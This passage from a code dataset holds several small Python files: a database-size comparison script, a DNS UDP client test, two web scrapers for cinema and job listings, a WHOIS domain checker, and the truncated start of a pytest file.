list_of_names\n\n\ndef copy_list(list1, list2, set_of_names):\n    # merges the rows of list1 and list2 into one result list, row by row\n    result_list = []\n    # pre-fill both date columns with zero sizes\n    for item in set_of_names:\n        d = {}\n        d['db_name'] = item\n        d[str(filenames[0]['date'])] = '0 kB'\n        d[str(filenames[1]['date'])] = '0 kB'\n        result_list.append(d)\n    # walk through each list row by row and, whenever a database name\n    # matches, copy its size into the corresponding result row\n    for row in list1:\n        for result_row in result_list:\n            if row['db_name'] == result_row['db_name']:\n                date = list(row.items())[1][0]\n                size = list(row.items())[1][1]\n                result_row[date] = size\n    for row in list2:\n        for result_row in result_list:\n            if row['db_name'] == result_row['db_name']:\n                date = list(row.items())[1][0]\n                size = list(row.items())[1][1]\n                result_row[date] = size\n    return result_list\n\n\ndef deltaFunc(csv_list):\n    # sort key: the delta column of the result table\n    return csv_list['delta']\n\n\ndef create_result_csv(result_list):\n    first_date = str(filenames[0]['date'])\n    second_date = str(filenames[1]['date'])\n    total = {first_date: 0, second_date: 0, 'delta': 0}\n    # the dates themselves serve as column names\n    for result_row in result_list:\n        delta = normalize_data_size(result_row[second_date]) - normalize_data_size(result_row[first_date])\n        result_row['delta'] = delta\n        total[first_date] += normalize_data_size(result_row[first_date])\n        total[second_date] += normalize_data_size(result_row[second_date])\n        total['delta'] += delta\n    result_list.sort(reverse=True, key=deltaFunc)\n    for k, v in total.items():\n        total[k] = human_readable_size(v)\n    for row in result_list:\n        row['delta'] = human_readable_size(row['delta'])\n    result_list.append(total)\n    print(result_list)\n    return result_list\n\n\ndef output_csv(result_list):\n    # writes the resulting csv file\n    csv_columns = ['db_name', str(filenames[0]['date']), str(filenames[1]['date']), 'delta']\n    csv_file = 'total.csv'\n    try:\n        with open(csv_file, 'w') as csvfile:\n            writer = csv.DictWriter(csvfile, 
fieldnames=csv_columns)\n            writer.writeheader()\n            for data in result_list:\n                writer.writerow(data)\n    except IOError:\n        print('I/O Error')\n\nif __name__ == \"__main__\":\n    get_files()\n    first_file = create_dict(filenames[0])\n    second_file = create_dict(filenames[1])\n    set_of_names = create_set_of_names(filenames[0]['name'], filenames[1]['name'])\n    copied_list = copy_list(first_file, second_file, set_of_names)\n    result_csv = create_result_csv(copied_list)\n    output_csv(result_csv)\n","sub_path":"db_size.py","file_name":"db_size.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"607798871","text":"#!/usr/bin/env python\n\nimport unittest\n\nfrom asyncdnspy.udp_client import UDPClient\nfrom asyncdnspy.dns_raw_message import DNSRawMessage\nfrom asyncdnspy.dnspy_enum import RecordType\n\n\nclass UDPClientTest(unittest.TestCase):\n\n    def test_send(self):\n        udp_client = UDPClient('8.8.8.8', 53)\n        udp_client.connect()\n        dns_raw_message = DNSRawMessage()\n        data = dns_raw_message.query('google.com', RecordType.a)\n        result = udp_client.send(data)\n        self.assertNotEqual(result, -1)\n        udp_client.close()\n\n    def test_receive(self):\n        udp_client = UDPClient('8.8.8.8', 53)\n        udp_client.connect()\n        dns_raw_message = DNSRawMessage()\n        data = dns_raw_message.query('google.com', RecordType.a)\n        result = udp_client.send(data)\n        self.assertNotEqual(result, -1)\n        response = udp_client.receive()\n        self.assertTrue(len(response) > 0)\n        udp_client.close()\n\n    def main(self):\n        self.test_send()\n        self.test_receive()\n\n\nif __name__ == '__main__':\n    tests = UDPClientTest()\n    tests.main()\n","sub_path":"tests/test_udp_client.py","file_name":"test_udp_client.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"98243324","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# theatercode 0297 is the Cheongju CGV\nurl = 'http://www.cgv.co.kr/common/showtimes/iframeTheater.aspx?areacode=01&theatercode=0297&date=20200605'\nhtml = requests.get(url)\n\n# print(html.text)\nsoup = BeautifulSoup(html.text, 'html.parser')\nmovie_list = soup.select('div.info-movie')\nfor i in movie_list:\n    print(i.select_one('a > strong').text.strip())\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"633650481","text":"import whois\nimport datetime\nimport csv\n\nnow = datetime.datetime.now()\ndomain_list = []\n\nheaders = ['Domain','Registrar','Registrar URL','Status','Reg Name','Reg Type','Reg Street','Reg City','Reg Country','Created','Expiration','Updated']\n\nwith open('domain_results.csv', 'w', newline='') as csvfile:\n\n    spamwriter = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n    spamwriter.writerow(headers)\n\n    # Read in the domains from the txt file into a list\n    with open(\"domains.txt\", \"r\") as domains:\n        for row in domains:\n            domain_list.append(row.strip('\\n'))\n\n    # Loop through the list and look up the WHOIS record for each domain\n    for domain in domain_list:\n        try:\n            res = whois.whois(domain)\n            exp = res['expiration_date']\n            expired = \"it expired on \" if exp < now else \"it expires on \"\n            spamwriter.writerow([domain,res['registrar'],res['registrar_url'],res['status'],\n                res['registrant_name'],res['registrant_type'],res['registrant_street'],res['registrant_city'],\n                
res['registrant_country'],res['creation_date'],res['expiration_date'],res['updated_date']])\n except:\n spamwriter.writerow([domain,'','','Available'])\n","sub_path":"domain_checker/domain_checker.py","file_name":"domain_checker.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"466458213","text":"# coding:utf-8\nimport urllib.request, json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'http://zhaopin.baidu.com/api/quanzhiasync?query=%E4%BA%A7%E5%93%81%E7%BB%8F%E7%90%86+%E6%8B%9B%E8%81%98&sort_type=1&city_sug=%E4%B8%8A%E6%B5%B7&detailmode=close&rn=20&pn=0'\n\nm1 = []\nm2 = []\ncontent = {}\n\nreq = urllib.request.Request(url)\nres = urllib.request.urlopen(req)\n#html = (res.read()).decode()\n\njd = json.loads(res.read())\nfor i in jd['data']['main']['data']['disp_data']:\n\tm1.append(i['age'])\n\tm2.append(i['district'])\n\ncontent['m1'] = m1\ncontent['m2'] = m2\n\njt = pd.DataFrame(content)\nprint(jt)\n","sub_path":"ai-pm.py","file_name":"ai-pm.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537913851","text":"import pathlib\n\nimport pytest\nimport respx\nfrom httpx import Response\n\nfrom tests.utils import make_snapshot\nfrom uzen.factories.scripts import ScriptFactory, get_script_sources\n\n\n@pytest.mark.asyncio\n@respx.mock\nasync def test_build_from_snapshot():\n snapshot = make_snapshot()\n snapshot.body = '